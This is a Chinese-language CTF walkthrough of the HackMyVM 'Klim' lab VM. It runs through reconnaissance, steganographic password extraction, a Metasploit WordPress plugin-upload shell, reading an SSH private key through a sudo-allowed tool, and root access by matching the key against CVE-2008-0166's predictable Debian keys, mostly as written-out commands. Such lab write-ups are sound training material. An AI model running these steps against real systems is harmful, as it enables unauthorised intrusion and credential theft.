自学内容网 自学内容网
自学内容网 > 正文

HackMyVM-Klim靶机的测试报告

🕗 发布于 2025-01-18 16:01 网络安全  HackMyVM靶场  openssl  CVE-2008-0166  wordpress文件上传漏洞  

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、Getshell

3、提权

CVE-2008-0166

四、结论

一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.159.127)

靶  机:debian(192.168.159.27)

注意事项:

①该类型靶场只能在virtualBox上搭建,因此将靶机设置为桥接网络,方便进行渗透。攻击机kali也要桥接出来,不然会出问题。

②靶机启动失败:设置中取消勾选usb即可

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、gobuster(目录扫描)、cmseek(获取cms信息)、stegseek(分析图片隐藏信息)、msfconsole(漏洞利用模块)、ssh(远程登录)

测试网址:http://192.168.159.27

靶场介绍:由国外大佬搭建的靶场,类似于vulnhub,经常更新,需要翻墙才能进。

地址:https://hackmyvm.eu/machines/machine.php?vm=Klim

二、测试目的

熟悉wordpress漏洞,熟悉ssh登录流程,以及CVE-2008-0166漏洞利用。获取2个flag。

三、操作过程

1、信息搜集

主机探测

arp-scan -l

靶机IP:192.168.159.27

物理机IP:192.168.159.241

端口和服务探测

nmap -sT -A -p- -T4 192.168.159.27

靶机开放了22端口(ssh服务)、80端口(web服务)

目录扫描

gobuster dir -u http://192.168.159.27 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

有wordpress目录

扫描wordpress目录

gobuster dir -u http://192.168.159.27/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

扫描wordpress/wp-content目录,该目录存在uploads目录

查看wordpress信息

​cmseek -u http://192.168.159.27/wordpress

获取用户名klim

2、Getshell

在wordpress/wp-content/uploads目录中找到一张图片

获取该图片,查看是否有隐藏信息

stegseek image.jpg

可以看到,找到了密码,输出了文件,是有东西的

查看文件,发现是数据包,而且有klim用户的密码

cat image.jpg.out

klim/ss7WhrrnnHOZC%239bQn

数据包是经过url编码的,将密码解码

klim/ss7WhrrnnHOZC#9bQn

现在可以登录wordpress了

在Plugins—Add New Plugin—Upload Plugin处可以上传文件,直接上传木马会被拦

使用msfconsole模块集成利用,上传插件漏洞

use exploit/unix/webapp/wp_admin_shell_upload
set rhost 192.168.159.27
set targeturi /wordpress
set username klim
set password ss7WhrrnnHOZC#9bQn
run

成功返回meterpreter会话

3、提权

获取交互式shell并查看sudo权限

python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -l

看到能以klim用户身份执行/home/klim/tool工具

使用file查看该文件,是一个可执行文件

file /home/klim/tool

使用help参数查看工具解析,可以看出这是cat命令,和cat命令一个作用

sudo -u klim /home/klim/tool --help

可以查看文件,那么首先查看klim用户家目录的文件

存在.ssh目录,查看私钥文件

ls -la /home/klim
sudo -u klim /home/klim/tool /home/klim/.ssh/id_rsa

将私钥写入id文件并ssh登录klim用户

vim id
chmod 600 id
ssh klim@192.168.159.27 -i id

在当前目录查看user.txt

cat user.txt

user.txt: 2fbef74059deaea1e5e11cff5a65b68e

CVE-2008-0166

基于Debian的操作系统上的OpenSSL 0.9.8c-1到0.9.8g-9之前的版本使用随机数生成器生成可预测的数字,这使得远程攻击者更容易对加密密钥进行暴力猜测攻击。

这个漏洞存在,生成的ssh密钥便可被预测,数量有限。所有ssh密钥对在如下地址下载:

https://github.com/g0tmi1k/debian-ssh/blob/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2

下载完成后,解压,可以在rsa/2048目录下查看所有公钥私钥

tar -xjf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
ls

利用该漏洞,需要找到公钥,然后根据公钥找到私钥

寻找公钥文件,发现在/opt目录下有个公钥文件,正是root用户的公钥文件

find / -name id_rs* -ls 2>/dev/null

根据公钥的加密信息去匹配已知公钥的编号

使用ssh登录,私钥指定为该编号即可

ssh root@192.168.159.27 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
cat root.txt

root.txt: 60667e12c8ea62295de82d053d950e1f

四、结论

Wordpress的文件上传漏洞可以利用,openssl的漏洞导致私钥可被查询出来。


原文地址:https://blog.csdn.net/2301_79698171/article/details/145201040

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!

相关文章

自学内容网
Copyright © 2015-2025